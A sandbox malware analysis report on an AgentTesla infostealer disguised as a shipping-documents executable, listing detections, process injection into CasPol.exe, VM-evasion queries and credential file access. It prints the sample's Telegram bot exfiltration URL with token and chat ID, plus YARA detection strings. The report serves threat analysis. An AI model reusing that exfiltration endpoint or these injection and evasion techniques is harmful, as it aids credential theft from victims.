
Windows Analysis Report
BL-SHIPPING DOCUMENTS.exe

Overview

General Information

Sample Name: BL-SHIPPING DOCUMENTS.exe
Analysis ID: 756203
MD5: 69fe54a9cafee09f25e0d3f7a51488c7
SHA1: 747373a2640c7fca04258681c7ec313be3b0db24
SHA256: dc72c7525da8aa1afaadaf707499054dd9be20d0c78318d2f63af1fa37d58546
Tags: agentteslaexe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Executable has a suspicious name (potential lure to open the executable)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Enables driver privileges
Drops PE files
Creates driver files
Spawns drivers
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates or modifies windows services
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • BL-SHIPPING DOCUMENTS.exe (PID: 6116 cmdline: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe MD5: 69FE54A9CAFEE09F25E0D3F7A51488C7)
    • CasPol.exe (PID: 5312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
Source | Rule | Description | Author | Strings

Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_AgentTesla_d3ac2b2f | Description: unknown | Author: unknown
  • 0x31be8:$a13: get_DnsResolver
  • 0x30301:$a20: get_LastAccessed
  • 0x325f5:$a27: set_InternalServerPort
  • 0x3292a:$a30: set_GuidMasterKey
  • 0x30413:$a33: get_Clipboard
  • 0x30421:$a34: get_Keyboard
  • 0x317bf:$a35: get_ShiftKeyDown
  • 0x317d0:$a36: get_AltKeyDown
  • 0x3042e:$a37: get_Password
  • 0x30f1a:$a38: get_PasswordHash
  • 0x32029:$a39: get_DefaultCredentials
Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source | Rule | Description | Author | Strings

Source: 1.0.CasPol.exe.400000.0.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 1.0.CasPol.exe.400000.0.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 1.0.CasPol.exe.400000.0.unpack | Rule: MALWARE_Win_AgentTeslaV3 | Description: AgentTeslaV3 infostealer payload | Author: ditekSHen
  • 0x348d8:$s10: logins
  • 0x34358:$s11: credential
  • 0x30613:$g1: get_Clipboard
  • 0x30621:$g2: get_Keyboard
  • 0x3062e:$g3: get_Password
  • 0x319af:$g4: get_CtrlKeyDown
  • 0x319bf:$g5: get_ShiftKeyDown
  • 0x319d0:$g6: get_AltKeyDown
Source: 1.0.CasPol.exe.400000.0.unpack | Rule: Windows_Trojan_AgentTesla_d3ac2b2f | Description: unknown | Author: unknown
  • 0x31de8:$a13: get_DnsResolver
  • 0x30501:$a20: get_LastAccessed
  • 0x327f5:$a27: set_InternalServerPort
  • 0x32b2a:$a30: set_GuidMasterKey
  • 0x30613:$a33: get_Clipboard
  • 0x30621:$a34: get_Keyboard
  • 0x319bf:$a35: get_ShiftKeyDown
  • 0x319d0:$a36: get_AltKeyDown
  • 0x3062e:$a37: get_Password
  • 0x3111a:$a38: get_PasswordHash
  • 0x32229:$a39: get_DefaultCredentials
              No Sigma rule has matched
Timestamp: 11/29/22-20:01:10.306536
Source IP: 192.168.2.5
Destination IP: 149.154.167.220
SID: 2851779
Source Port: 49705
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected


              AV Detection

Source: BL-SHIPPING DOCUMENTS.exe | ReversingLabs: Detection: 22%
Source: BL-SHIPPING DOCUMENTS.exe | Virustotal: Detection: 26%
Source: BL-SHIPPING DOCUMENTS.exe | Joe Sandbox ML: detected
Source: 1.0.CasPol.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.CasPol.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
Source: CasPol.exe.5312.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: BL-SHIPPING DOCUMENTS.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Azez\Downloads\JesusIsTheLord\obj\Debug\Tora.pdb | source: BL-SHIPPING DOCUMENTS.exe
Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb | source: ?????.sys.0.dr

              Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dad24475608cee | Host: api.telegram.org | Content-Length: 1001 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://TcwLAp.com
Source: CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: CasPol.exe, 00000001.00000002.829202853.000000000634E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.823692783.0000000003476000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://FZsMKmQQms.net
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/1504449137%discordapi%yyy
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: ?????.sys.0.dr | String found in binary or memory: https://www.sysinternals.com0
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | HTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dad24475608cee | Host: api.telegram.org | Content-Length: 1001 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org

              System Summary

Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: initial sample | Static PE information: Filename: BL-SHIPPING DOCUMENTS.exe
Source: BL-SHIPPING DOCUMENTS.exe, 6WPvYiAf4rXCUiIeqR/yw3NM9q.cs | Large array initialization: get_hii: array initializer size 481808
Source: 1.0.CasPol.exe.400000.0.unpack, <PrivateImplementationDetails>{7B11A2CA-4195-4BA6-80B6-4DED58549CE3}/AB3968ED-5083-4DC4-8042-AEEF6AA978C6.cs | Large array initialization: .cctor: array initializer size 10967
Source: BL-SHIPPING DOCUMENTS.exe | Static file information: Suspicious name
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_013DF928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_062276F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622CF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622A4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06225BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622768E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06225A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622F2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06223330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0623BE8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06239330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0623AF88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_062355A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06237F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06235148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06260040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06266BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06264940
Source: BL-SHIPPING DOCUMENTS.exe | Static PE information: No import functions for PE file found
Source: BL-SHIPPING DOCUMENTS.exe, 00000000.00000000.294039258.00000249F70DA000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
Source: BL-SHIPPING DOCUMENTS.exe | Binary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Process token adjusted: Load Driver
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | File created: C:\Users\user\AppData\Local\Temp\?????.sys
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKill
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
Source: BL-SHIPPING DOCUMENTS.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BL-SHIPPING DOCUMENTS.exe.log
Source: ?????.sys.0.dr | Binary string: \DosDevices\PROCEXP152\ObjectTypes\\Device\PROCEXP152PsAcquireProcessExitSynchronizationPsReleaseProcessExitSynchronizationMmGetMaximumNonPagedPoolInBytesObGetObjectTypeMutantIoCreateDeviceSecureIoValidateDeviceIoControlAccessD:P
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@1/1
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: BL-SHIPPING DOCUMENTS.exe, 6WPvYiAf4rXCUiIeqR/yw3NM9q.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 1.0.CasPol.exe.400000.0.unpack, A/f2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: BL-SHIPPING DOCUMENTS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BL-SHIPPING DOCUMENTS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622CF70 push es; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_062218AD push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_062218BE push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_062218C5 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_062218CA push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06222177 push edi; retn 0000h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06239283 push esp; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.998151218559443

              Persistence and Installation Behavior

Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | File created: C:\Users\user\AppData\Local\Temp\?????.sys
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TaskKill
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 23 times in this section)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 62 times in this section)

              Malware Analysis System Evasion

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe TID: 4708 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3724 | Thread sleep time: -26747778906878833s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4816 | Thread sleep count: 9841 > 30
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\?????.sys
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9841
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
              Source: CasPol.exe, 00000001.00000002.829128989.0000000006340000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Process token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06232530 LdrInitializeThunk,
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 438000
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43A000
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D1F008
              Source: BL-SHIPPING DOCUMENTS.exe, kmLQrC0PWk0U/qFi2Tt7TNT.cs | Reference to suspicious API methods: ('4y8gu7rkkr', 'LoadLibraryW@kernel32')
              Source: 1.0.CasPol.exe.400000.0.unpack, A/C1.cs | Reference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
              Source: 1.0.CasPol.exe.400000.0.unpack, A/e2.cs | Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Queries volume information: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
              Source: Yara match | File source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
